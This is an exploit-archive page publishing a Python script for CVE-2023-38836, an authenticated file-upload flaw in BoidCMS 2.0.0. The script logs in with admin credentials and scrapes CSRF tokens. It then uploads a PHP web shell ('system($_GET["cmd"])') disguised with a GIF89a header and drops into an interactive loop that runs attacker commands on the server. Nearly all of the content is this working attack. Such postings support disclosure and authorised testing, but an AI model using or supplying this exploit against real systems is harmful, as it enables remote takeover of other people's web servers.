BoidCMS 2.0.0 Shell Upload

2023.10.10
Credit: 1337kid
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

#!/usr/bin/python3 # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability # Date: 08/21/2023 # Exploit Author: 1337kid # Vendor Homepage: https://boidcms.github.io/#/ # Software Link: https://boidcms.github.io/BoidCMS.zip # Version: <= 2.0.0 # Tested on: Ubuntu # CVE : CVE-2023-38836 import requests import re import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836') parser.add_argument("-u", "--url", help="website url") parser.add_argument("-l", "--user", help="admin username") parser.add_argument("-p", "--passwd", help="admin password") args = parser.parse_args() base_url=args.url user=args.user passwd=args.passwd def showhelp(): print(parser.print_help()) exit() if base_url == None: showhelp() elif user == None: showhelp() elif passwd == None: showhelp() with requests.Session() as s: req=s.get(f'{base_url}/admin') token=re.findall('[a-z0-9]{64}',req.text) form_login_data={ "username":user, "password":passwd, "login":"Login", } form_login_data['token']=token s.post(f'{base_url}/admin',data=form_login_data) #=========== File upload to RCE req=s.get(f'{base_url}/admin?page=media') token=re.findall('[a-z0-9]{64}',req.text) form_upld_data={ "token":token, "upload":"Upload" } #==== php shell php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>'] with open('shell.php','w') as f: f.writelines(php_code) #==== file = {'file' : open('shell.php','rb')} s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data) req=s.get(f'{base_url}/media/shell.php') if req.status_code == '404': print("Upload failed") exit() print(f'Shell uploaded to "{base_url}/media/shell.php"') while 1: cmd=input("cmd >> ") if cmd=='exit': exit() req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd}) print(req.text)


Vote for this issue:
87%
13%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top